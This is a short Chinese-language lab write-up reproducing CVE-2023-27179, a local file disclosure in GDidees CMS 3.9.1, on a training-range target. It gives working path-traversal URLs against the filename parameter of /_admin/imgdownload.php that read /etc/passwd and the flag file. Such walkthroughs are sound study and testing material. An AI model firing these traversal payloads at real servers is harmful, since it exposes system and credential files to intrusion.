GDidees CMS v3.9.1本地文件泄露漏洞(CVE-2023-27179)

漏洞简介:

GDidees CMS v3.9.1及更低版本被发现存在本地文件泄露漏洞,漏洞通过位于 /_admin/imgdownload.php 的 filename 参数进行利用。

漏洞环境:

春秋云镜中的漏洞靶标,CVE编号为CVE-2023-27179

漏洞复现:

进入靶场发现没有什么可以利用的地方,那么就按照靶场提示来,直接访问/_admin/imgdownload.php

打开后发现是一片空白,那么直接上参数filename

第一次尝试

复制代码
http://eci-2ze1l7f5cevdmi4pngfi.cloudeci1.ichunqiu.com/_admin/imgdownload.php?filename=../../../../../../etc/passwd

发现下载了一张图片

用notepad++打开图片发现确实获取到了用户的信息

那么直接获取flag

复制代码
eci-2ze1l7f5cevdmi4pngfi.cloudeci1.ichunqiu.com/_admin/imgdownload.php?filename=../../../../../../flag

或者还有一种办法是我们用bp抓包,放到重放器里,可以直接回显出文件内容

或者是直接用curl指令请求

相关推荐
白帽小阳17 小时前
我的AI辅助开发工具链2026版:从编码到部署的全栈智能实践
网络·人工智能·学习·安全·自动化
HackTwoHub17 小时前
AntiDebug Mcp、AI逆向绕过前端,Hook 加密接口,抓取 Vue 路由漏洞,接入 MCP 让 AI 自动化挖掘前端漏洞
前端·vue.js·人工智能·安全·web安全·网络安全·系统安全
无忧智库18 小时前
数据安全与数据合规体系建设规划:从“合规应付”到“数据可控、可用、可审计”的落地指南(PPT)
大数据·人工智能·安全
ATA888818 小时前
企业数据库账号安全的技术解决方案
数据库·安全
Sirius Wu18 小时前
OpenClaw 并发安全完整详解
网络·人工智能·安全·ai·架构·aigc
李白你好18 小时前
一款面向攻防演练、红蓝对抗和安全研究场景的高交互智能欺骗蜜罐平台
安全·交互
qcx2320 小时前
SpaCellAgent:用 LLM 多智能体怎么用于单细胞轨迹分析的?效率提升了多少?
人工智能·gpt·安全·ai·机器人·llm·agent
leagsoft_100320 小时前
从“策略看不清”到“风险可收敛”:某高端精密制造企业的网络安全策略治理实践
网络·web安全·制造
味悲20 小时前
SQL注入从入门到实战
数据库·sql·安全
QYR-分析1 天前
机器人安全控制器行业高速扩容 本土替代迎来全新发展窗口期
人工智能·安全·机器人